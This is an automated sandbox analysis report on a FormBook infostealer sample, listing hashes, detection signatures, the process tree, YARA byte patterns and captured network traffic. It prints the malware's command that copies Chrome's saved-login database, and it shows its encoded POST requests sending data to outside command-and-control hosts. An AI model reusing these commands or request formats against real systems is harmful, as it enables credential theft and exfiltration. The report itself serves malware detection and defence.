Loading ...

Play interactive tourEdit tour

Analysis Report 168768566-104646-sdfnt5-8.exe

Overview

General Information

Sample Name:168768566-104646-sdfnt5-8.exe
MD5:603a48198c41123efabb3db2e8bbddd9
SHA1:36d91ddf5700af40a811b1c3483766bf512d5752
SHA256:02006bc9a2d455f7c478381b5be9283223dd6e859018d6092c9948f665f226d8

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 168768566-104646-sdfnt5-8.exe (PID: 4456 cmdline: 'C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe' MD5: 603A48198C41123EFABB3DB2E8BBDDD9)
    • 168768566-104646-sdfnt5-8.exe (PID: 5220 cmdline: {path} MD5: 603A48198C41123EFABB3DB2E8BBDDD9)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • cmmon32.exe (PID: 5180 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 5288 cmdline: /c del 'C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3788 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • sxah0fixnx-4c.exe (PID: 4396 cmdline: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe MD5: 603A48198C41123EFABB3DB2E8BBDDD9)
        • mstsc.exe (PID: 5816 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 1F73D52590D1EDF803FD49EAF32ADC2E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18429:$sqlite3step: 68 34 1C 7B E1
      • 0x1853c:$sqlite3step: 68 34 1C 7B E1
      • 0x18458:$sqlite3text: 68 38 2A 90 C5
      • 0x1857d:$sqlite3text: 68 38 2A 90 C5
      • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18429:$sqlite3step: 68 34 1C 7B E1
        • 0x1853c:$sqlite3step: 68 34 1C 7B E1
        • 0x18458:$sqlite3text: 68 38 2A 90 C5
        • 0x1857d:$sqlite3text: 68 38 2A 90 C5
        • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
        2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17629:$sqlite3step: 68 34 1C 7B E1
          • 0x1773c:$sqlite3step: 68 34 1C 7B E1
          • 0x17658:$sqlite3text: 68 38 2A 90 C5
          • 0x1777d:$sqlite3text: 68 38 2A 90 C5
          • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 7 entries

          Sigma Overview


          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 5180, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3788

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Gilths\sxah0fixnx-4c.exeVirustotal: Detection: 37%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: 168768566-104646-sdfnt5-8.exeVirustotal: Detection: 37%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Gilths\sxah0fixnx-4c.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: 168768566-104646-sdfnt5-8.exeJoe Sandbox ML: detected
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h18_2_072F16E4
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then push dword ptr [ebp-24h]18_2_072F2200
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh18_2_072F2200
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then push dword ptr [ebp-20h]18_2_072F1EE0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh18_2_072F1EE0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then xor edx, edx18_2_072F212D
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then xor edx, edx18_2_072F2138
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then push dword ptr [ebp-24h]18_2_072F21F4
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh18_2_072F21F4
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then push dword ptr [ebp-20h]18_2_072F1ED4
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh18_2_072F1ED4
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h18_2_072F19FC

          Source: global trafficHTTP traffic detected: GET /sr1/?azrhA=EEC3trxbjpZjES3J8UzdywVW4camKv5lKnOZdgutgRQJhFNNU6ohax/dLti9iqHJLoKb&HN68=m8ZXDT HTTP/1.1Host: www.spatren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sr1/?azrhA=TJu9kd1J3sj1sjyEQYrTfM8kzVKXOtoVWGC/eynSyKofNPs3fDsvQyrmT3NPrOg1vii2&HN68=m8ZXDT HTTP/1.1Host: www.app7924.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sr1/?azrhA=jkOn9Rty+lecef8GTlcZ36CwLFKq9e7GvHBSrLgwDHppX0QlwzfNM6KJV290CG150kbC&HN68=m8ZXDT HTTP/1.1Host: www.ptgws.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /sr1/ HTTP/1.1Host: www.app7924.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.app7924.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.app7924.com/sr1/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 7a 72 68 41 3d 62 72 69 48 36 36 56 49 69 4d 54 39 7e 42 65 5f 63 74 69 36 4c 4a 77 62 6b 33 53 51 4a 35 73 30 4c 41 6a 4a 49 51 54 34 78 61 63 37 4a 2d 45 7a 53 47 39 48 58 45 75 71 42 42 6c 4f 6d 62 6f 4b 33 68 50 4a 6e 77 37 31 32 79 69 78 6c 46 62 70 67 48 38 39 56 69 42 32 6f 4a 63 64 65 4c 49 70 6f 34 57 44 77 72 56 31 59 4f 48 44 64 42 50 32 5a 4b 65 33 79 6b 34 50 38 5a 28 54 67 48 74 70 6f 4a 57 79 37 61 6c 42 5a 4c 76 30 30 4b 68 4f 58 4d 55 61 6c 4d 71 66 41 35 73 4a 4f 67 76 58 62 34 4c 66 56 37 55 65 36 58 6a 70 53 51 64 74 48 54 69 34 55 6c 76 67 46 79 59 5a 28 67 64 4d 39 39 61 51 42 36 6f 34 68 75 76 6a 38 51 4f 35 28 77 28 71 45 35 70 53 33 51 42 69 66 30 62 56 52 69 56 63 42 6b 4a 73 58 64 62 48 4f 78 4d 68 6c 61 73 65 4d 74 76 69 50 34 69 78 4b 75 35 52 6b 64 77 46 6d 6e 76 76 6a 4d 33 70 57 67 74 70 62 56 43 61 4a 78 50 46 73 76 55 65 32 41 6a 48 51 6f 7a 39 79 70 58 36 62 34 49 47 34 51 56 70 37 4c 5a 73 41 65 64 36 57 44 47 78 70 64 36 77 6f 53 72 61 6b 5f 70 72 58 58 76 79 38 72 56 67 42 52 50 55 44 6d 75 34 48 6f 72 4c 4e 4f 7e 70 39 6b 64 6d 52 78 45 78 50 59 58 4c 78 6c 42 42 38 79 6d 4c 59 78 50 65 54 32 4a 37 50 6c 6c 74 39 4e 45 5f 5a 53 6a 2d 31 53 72 6a 28 78 6d 51 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: azrhA=briH66VIiMT9~Be_cti6LJwbk3SQJ5s0LAjJIQT4xac7J-EzSG9HXEuqBBlOmboK3hPJnw712yixlFbpgH89ViB2oJcdeLIpo4WDwrV1YOHDdBP2ZKe3yk4P8Z(TgHtpoJWy7alBZLv00KhOXMUalMqfA5sJOgvXb4LfV7Ue6XjpSQdtHTi4UlvgFyYZ(gdM99aQB6o4huvj8QO5(w(qE5pS3QBif0bVRiVcBkJsXdbHOxMhlaseMtviP4ixKu5RkdwFmnvvjM3pWgtpbVCaJxPFsvUe2AjHQoz9ypX6b4IG4QVp7LZsAed6WDGxpd6woSrak_prXXvy8rVgBRPUDmu4HorLNO~p9kdmRxExPYXLxlBB8ymLYxPeT2J7Pllt9NE_ZSj-1Srj(xmQcA).
          Source: global trafficHTTP traffic detected: POST /sr1/ HTTP/1.1Host: www.app7924.comConnection: closeContent-Length: 180335Cache-Control: no-cacheOrigin: http://www.app7924.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.app7924.com/sr1/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 7a 72 68 41 3d 62 72 69 48 36 37 4d 37 6b 38 65 68 76 44 32 4e 4e 4d 32 58 66 49 59 5a 33 58 6d 69 41 4f 67 4b 43 7a 6e 5a 49 52 6a 30 33 66 34 6c 43 5f 30 7a 61 67 68 4d 64 45 75 6c 44 42 6c 50 74 37 73 59 7e 58 4c 42 6e 78 76 66 32 79 61 75 76 6d 7a 73 68 58 38 71 48 33 5a 61 75 4a 5a 42 65 4a 4d 59 35 61 36 62 31 72 52 31 47 71 72 42 52 44 32 71 4e 62 53 34 73 6b 31 46 7e 59 47 46 67 30 59 65 6f 70 50 56 7a 5f 42 48 4f 64 76 76 71 61 51 68 64 2d 30 46 6d 64 4f 59 5a 4f 6b 61 4b 42 6a 54 65 35 4c 74 4a 4b 55 64 7a 48 72 76 58 53 56 50 52 33 61 46 57 30 66 30 46 78 70 69 32 31 56 64 71 71 36 59 4f 72 56 58 35 50 62 79 32 42 4f 62 37 7a 58 68 47 36 68 39 28 30 4e 39 56 48 66 41 53 67 64 4d 50 67 6c 58 52 76 7a 44 46 67 38 4a 6f 70 41 57 42 4e 66 4e 47 62 43 6d 41 65 5a 4a 68 66 39 73 34 33 75 7a 6c 4d 33 54 44 54 31 52 4e 6d 76 55 4f 67 66 6e 68 4f 4e 45 78 51 28 47 54 71 32 79 39 74 58 5f 5a 4a 51 4b 7a 41 30 65 7e 6f 31 64 56 4d 42 42 59 6a 47 71 79 50 53 5f 6f 53 72 73 6b 37 46 53 52 6a 6e 79 39 36 59 6d 4d 57 54 49 55 57 76 6f 45 34 37 4a 44 65 54 30 39 6b 31 6d 58 42 30 49 4f 72 48 4c 6e 6a 46 43 28 54 6d 4c 66 42 50 65 4b 6d 4a 73 41 57 34 6b 79 4e 49 35 64 7a 53 36 79 46 53 70 28 41 61 64 42 61 74 46 4a 6e 75 69 70 64 63 49 42 39 79 61 76 6a 76 61 49 75 28 79 59 30 46 68 73 42 34 41 54 4b 6b 61 36 33 63 43 6a 55 37 77 45 51 34 57 68 2d 45 4f 39 2d 42 48 49 31 76 58 58 44 30 72 4d 71 67 35 44 2d 75 53 57 79 39 4e 4c 42 53 30 75 5a 78 55 54 51 31 6d 61 6e 78 37 39 63 31 77 78 79 35 64 4b 4c 59 62 78 5f 49 49 67 6b 50 5f 53 33 4d 71 51 64 6a 70 41 6e 32 6e 28 6e 4c 51 4a 6e 76 36 59 65 4a 30 63 44 68 47 67 4d 31 72 43 55 6a 6a 4d 33 36 5a 69 47 79 68 31 67 45 33 31 45 48 43 34 56 61 70 72 6b 4a 75 54 6b 50 62 7e 65 4e 76 68 55 67 6f 4d 77 28 34 43 5f 47 65 63 31 4b 6a 57 32 41 66 51 4a 4d 44 65 6c 74 6e 53 32 6c 42 57 52 63 77 30 43 4c 45 62 36 51 79 33 72 46 65 6a 63 6b 6e 67 30 59 63 75 42 52 4d 64 46 66 48 30 77 56 73 57 35 38 6f 50 32 56 64 57 51 4e 39 69 4c 47 45 58 4f 55 61 67 4d 7e 56 70 34 4c 6a 6c 68 52 6f 53 6a 6d 49 4f 59 4d 74 59 75 4c 73 6e 4f 67 41 54 35 64 76 50 5a 6b 49 35 59 7a 5f 57 6f 72 78 36 5a 46 4b 6f 68 4d 61 6a 56 51 6f 7e 77 53 41 4d 65 4c 73 56 44 59 42 77 72 43 61 63 71 45 72 69 31 4b 6e 42 67 45 52 64 36 33 38 31 48 54 66 4a 36 4e 71 4c 4c 6e 4f 30 54 75 79 67 68 6a 49 56 33 62 50 37 4b 78 43 48 76 43 6c 61 4c 4f 6a 55 4c 31 55 62 77 45 49 71 4b 4d 70 31 79 42 31 7e 45 77 4f 56 46 6a 37 47 62 76 62 62 31 63 38 45 71 47 56 78 61 75 37 61 56 55 4d 4c 74 7e 6c 62 73 31 2d 49 65 56 79 6d 79 79 47 76 44 4c 6b 55 44 78 64 77 4
          Source: global trafficHTTP traffic detected: POST /sr1/ HTTP/1.1Host: www.ptgws.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ptgws.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ptgws.com/sr1/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 7a 72 68 41 3d 72 47 43 64 6a 31 6b 62 69 67 54 57 4c 34 6b 4f 5a 6a 51 41 6c 4d 75 44 64 48 71 6f 7a 64 66 58 71 7a 52 56 34 71 63 4b 41 58 78 32 57 55 39 39 6d 47 4b 6f 42 66 37 30 47 56 67 50 44 44 35 51 72 42 33 47 39 63 72 64 72 4d 6f 36 7a 44 6e 37 66 79 4b 65 4a 46 62 63 76 6e 79 33 50 78 46 65 6a 71 4e 55 36 57 4f 57 48 30 67 6a 75 44 39 73 4a 67 63 38 74 45 54 6e 64 4d 63 77 32 53 49 46 5a 6d 4d 76 50 45 57 31 6c 52 62 49 4d 70 79 53 5a 75 67 42 35 38 57 79 36 68 52 62 61 64 34 70 55 54 66 54 5a 56 74 78 68 73 31 57 30 56 77 58 32 30 57 50 32 48 51 39 52 6b 37 46 33 64 55 52 63 44 57 52 38 5a 4b 7a 28 78 52 30 73 67 58 69 35 4f 57 4f 4b 67 42 59 6c 78 6d 52 63 30 6b 6d 32 74 41 6d 44 55 55 52 65 78 55 49 67 49 61 4a 43 5f 48 38 57 58 31 61 61 6c 6f 4f 30 72 68 57 46 74 36 5f 34 50 31 2d 48 6a 47 4f 51 31 43 64 48 71 31 42 7e 39 49 32 6d 47 48 56 41 2d 35 76 68 63 34 62 44 6f 65 37 75 38 5a 36 28 65 44 51 28 51 37 35 52 52 72 7a 54 67 69 58 30 47 51 76 41 72 33 66 4a 52 50 7a 71 39 50 51 48 6a 43 32 50 7a 4d 4e 55 42 7a 50 4a 70 69 62 73 58 43 5a 54 39 33 56 7e 67 70 57 70 6e 6d 50 4b 53 38 55 4f 2d 57 54 37 50 6d 42 45 47 41 44 39 73 34 70 63 37 38 74 6a 44 32 55 50 36 36 6a 39 57 7e 54 44 67 29 2e 00 51 63 41 29 2e 00 00 Data Ascii: azrhA=rGCdj1kbigTWL4kOZjQAlMuDdHqozdfXqzRV4qcKAXx2WU99mGKoBf70GVgPDD5QrB3G9crdrMo6zDn7fyKeJFbcvny3PxFejqNU6WOWH0gjuD9sJgc8tETndMcw2SIFZmMvPEW1lRbIMpySZugB58Wy6hRbad4pUTfTZVtxhs1W0VwX20WP2HQ9Rk7F3dURcDWR8ZKz(xR0sgXi5OWOKgBYlxmRc0km2tAmDUURexUIgIaJC_H8WX1aaloO0rhWFt6_4P1-HjGOQ1CdHq1B~9I2mGHVA-5vhc4bDoe7u8Z6(eDQ(Q75RRrzTgiX0GQvAr3fJRPzq9PQHjC2PzMNUBzPJpibsXCZT93V~gpWpnmPKS8UO-WT7PmBEGAD9s4pc78tjD2UP66j9W~TDg).QcA).
          Source: global trafficHTTP traffic detected: POST /sr1/ HTTP/1.1Host: www.ptgws.comConnection: closeContent-Length: 180335Cache-Control: no-cacheOrigin: http://www.ptgws.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ptgws.com/sr1/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 7a 72 68 41 3d 72 47 43 64 6a 30 73 68 6a 51 6d 4e 63 2d 59 38 64 67 39 53 6a 66 7e 42 66 58 75 61 36 75 50 44 32 52 6b 51 34 71 73 47 47 56 59 72 46 6b 68 39 33 67 65 76 49 66 37 33 58 46 67 41 48 44 39 43 30 47 4c 4f 39 59 53 36 72 4d 67 39 6f 78 28 30 52 43 4c 47 50 6c 6e 67 70 6e 58 72 50 33 63 4d 69 4a 68 32 77 32 4b 57 4a 6b 70 6c 67 47 5a 4e 4f 6c 73 6a 76 30 50 69 66 4d 30 69 32 67 38 39 59 45 78 43 43 52 32 67 30 55 54 66 43 4b 62 33 63 39 77 4f 33 4d 71 35 30 44 74 45 55 63 6b 74 56 53 66 68 41 30 74 77 28 4d 4e 55 78 58 70 71 7a 46 53 6d 36 33 68 4f 52 6d 61 77 36 49 56 58 59 43 4c 64 39 6f 48 6d 78 67 46 32 70 58 36 39 39 4d 28 38 49 67 78 6e 70 54 75 4b 62 6c 4d 76 33 76 70 72 65 68 34 44 63 41 59 55 72 64 6d 62 45 73 71 78 55 57 46 31 41 7a 6f 5a 7e 59 5a 65 43 75 58 63 32 50 31 64 4c 44 47 53 66 6d 71 6c 58 59 5a 4b 35 70 30 55 78 6c 6d 66 46 76 56 75 69 65 38 58 63 63 4f 34 6f 4f 6c 32 33 4a 7e 6e 75 6e 43 37 41 6a 33 32 4c 51 69 4d 28 6b 34 6d 41 72 33 39 4a 51 50 56 72 4d 4c 51 46 32 50 6f 4d 51 6b 37 53 42 7a 43 49 36 4b 64 6a 45 57 7a 54 39 76 56 28 51 35 38 70 55 47 50 4f 41 30 4c 4f 62 32 54 35 5f 6d 42 66 32 42 57 78 5f 52 6e 64 73 55 70 76 31 62 55 45 73 48 52 79 43 28 76 42 63 6c 47 79 62 53 41 4e 51 50 68 35 6c 37 71 56 6a 30 57 44 6c 4e 51 31 34 45 4c 39 7a 6a 52 74 6c 61 5f 52 5f 35 4b 7a 67 52 43 6c 78 63 45 62 38 39 6f 31 78 36 72 4e 55 4e 4f 56 4f 42 67 6b 72 65 33 45 59 39 75 74 66 58 44 54 4a 37 58 57 76 38 30 6c 78 71 4c 6e 38 6e 43 36 7a 46 55 5a 6f 41 62 59 59 5a 55 55 52 62 53 58 43 39 64 4e 53 56 6f 70 7a 66 6d 28 7a 55 67 6c 52 73 49 38 7a 45 6b 5a 71 77 6c 4a 36 36 47 49 6d 44 78 4d 6b 6c 6d 6a 74 5a 69 4f 57 6b 61 7a 41 57 44 4b 54 4d 50 41 76 41 73 68 70 4c 72 30 32 62 4d 4d 37 43 33 67 7a 59 35 33 59 46 72 4e 6f 35 61 43 30 31 6d 59 41 47 6e 33 33 6b 35 7a 64 59 30 6a 4f 4d 39 7a 67 67 50 6b 41 7a 61 4e 45 74 4e 50 6a 51 4f 74 55 38 74 31 43 4f 6c 6e 4a 4e 64 36 54 74 44 4b 73 4a 72 77 67 34 59 30 42 47 34 76 75 45 77 62 4c 50 7a 38 46 63 30 4d 61 48 6c 62 4c 53 48 37 38 49 4a 58 76 52 56 4f 4a 4a 56 57 4b 4b 43 41 68 36 41 74 76 49 62 38 4f 41 79 55 56 62 77 69 49 45 42 59 75 6d 78 56 54 48 73 6d 4c 54 48 55 63 49 63 70 31 66 77 58 59 76 4e 54 75 33 72 76 57 50 51 4d 79 6c 6c 79 4e 49 51 64 76 4c 57 58 6f 54 45 28 4f 78 35 69 4e 65 56 51 45 45 4e 30 36 61 64 4d 65 45 48 56 6b 63 63 47 6a 32 4d 70 52 54 30 62 5f 6f 4c 42 39 4a 43 67 48 7a 39 49 4f 73 58 79 74 4a 5a 5a 67 59 71 6b 73 77 30 32 32 75 4f 7e 30 6f 4e 49 65 71 7a 39 4b 50 6c 6a 6e 68 56 4d 47 32 55 55 4b 67 78 73 76 72 58 7e 59 51 67 4a 5f 46 4b 48 35 78 6
